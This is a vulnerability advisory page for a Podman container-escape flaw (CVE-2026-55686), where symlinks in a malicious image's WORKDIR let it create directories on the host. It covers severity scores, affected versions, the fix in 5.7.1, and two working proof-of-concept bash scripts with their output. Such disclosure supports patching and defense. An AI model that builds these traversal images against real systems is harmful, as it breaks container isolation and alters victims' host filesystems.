Skip to main content

Podman EUVDEUVD-2026-39808

| CVE-2026-55686 MEDIUM
Improper Link Resolution Before File Access (CWE-59)
2026-06-18 https://github.com/podman-container-tools/podman GHSA-q6r4-3wmg-fwcq
5.3
CVSS 3.1 · Vendor: https://github.com/podman-container-tools/podman
Share

Severity by source

Vendor (https://github.com/podman-container-tools/podman) PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
vuln.today AI
3.8 LOW

Local execution of the container image is required (AV:L, PR:L); host filesystem modification outside the container boundary constitutes a scope change (S:C); impact is integrity-only directory creation (I:L, C:N, A:N).

3.1 AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
4.0 AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N
SUSE
3.3 MEDIUM
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Primary rating from Vendor (https://github.com/podman-container-tools/podman).

CVSS VectorVendor: https://github.com/podman-container-tools/podman

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 15:51 vuln.today
Analysis Generated
Jun 18, 2026 - 15:51 vuln.today

DescriptionCVE.org

Summary

Running a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.

Patch

https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0

Details

This issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)

PoC

The reproducer script _test1.bash_ demonstrates the vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /var/BREAKOUT as current working directory.

The reproducer script _test2.bash_ demonstrates the same vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /usr/local as current working directory.

The reproducer script _test2.bash_ shows that the working directory can be different from the breakout directory.

Reproducer test1.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
RUN cd / && ln -s ../../../../../../../var symlink
USER 1234:1234
WORKDIR /symlink/BREAKOUT
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Reproducer test2.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
ARG breakout_dirname=/var
ARG breakout_basename=BREAKOUT
ARG produce_pwd=/usr/local
RUN mkdir -p /0/1/2/3 && \
    cd /0 && \
    ln -s 1/2/3 symlink1 && \
    mkdir -p /0/1/symlink2/${breakout_dirname} && \
    cd /0/1/symlink2/${breakout_dirname} && \
    ln -s ${produce_pwd} ${breakout_basename}
RUN cd / && ln -s ../../../../../../.. symlink2
USER 1234:1234
WORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Vulnerable:

podman 5.7.0 using Fedora CoreOS 43.20251120.3.0

root@localhost:~
# bash test1.bash
38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80
current working directory: /var/BREAKOUT
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT
root@localhost:~
# rmdir /var/BREAKOUT/
root@localhost:~
# bash test2.bash
c3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9
current working directory: /usr/local
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT

Not vulnerable:

podman 5.7.1 using Fedora CoreOS 43.20260119.1.1

root@localhost:~
# bash test1.bash
0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788
current working directory: /var/BREAKOUT
ls: cannot access '/var/BREAKOUT': No such file or directory
root@localhost:~
# bash test2.bash
568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60
current working directory: /usr/local
ls: cannot access '/var/BREAKOUT': No such file or directory

Credits

We like to thank Erik Sjölund (@eriksjolund) for reporting the security impact to us.

AnalysisAI

WORKDIR symlink traversal in Podman allows a malicious container image to create arbitrary directories - and under a race condition, modify ownership - directly on the host filesystem, breaking container isolation. Affected versions include Podman v5 through 5.7.0, v4 through 4.9.5, and v3 through 3.4.7; the flaw is in the WORKDIR path resolution logic, which fails to confine symlink dereferences to the container's mount namespace. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker crafts malicious Containerfile with traversal symlinks
Delivery
Image published to accessible container registry
Exploit
Victim pulls and executes image via podman run
Execution
Podman resolves WORKDIR following symlink outside container root
Impact
Host directory created at attacker-chosen path with container USER ownership

Vulnerability AssessmentAI

Exploitation Exploitation requires that a victim operator executes `podman run` (or an equivalent API call) using a malicious container image where: (1) the Containerfile includes a RUN instruction creating one or more symlinks pointing to a path outside the container root using relative traversal sequences (e.g., `ln -s ../../../../../var symlink`), and (2) the WORKDIR directive resolves through those symlinks to a non-existent target directory on the host. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Several signals in the provided data conflict and require reconciliation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker publishes a malicious container image to a public or accessible registry; the image's Containerfile embeds a symlink (e.g., `/symlink -> ../../../../../var`) and sets `WORKDIR /symlink/BREAKOUT`. When an operator or automated CI/CD pipeline runs this image against a vulnerable Podman installation using `podman run`, Podman's WORKDIR resolution follows the symlink chain outside the container root and calls `os.MkdirAll` on `/var/BREAKOUT` directly on the host filesystem. …
Remediation Upgrade to Podman 5.7.1 or later, which replaces the vulnerable symlink resolution logic with `securejoin.SecureJoin()` (patch commits 7ce2e00ab140c11a68301f0b161f51984131a858 and d18e44e9abb3bf5b7294aa70806e1368fdddfdd0, vendor advisory https://github.com/podman-container-tools/podman/security/advisories/GHSA-q6r4-3wmg-fwcq). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: Moderate
Product Status
SUSE Linux Enterprise High Performance Computing 15 SP7 Affected
SUSE Linux Enterprise Micro 5.3 Affected
SUSE Linux Enterprise Micro 5.4 Affected
SUSE Linux Enterprise Micro 5.5 Affected
SUSE Linux Enterprise Module for Containers 15 SP7 Affected

Share

EUVD-2026-39808 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy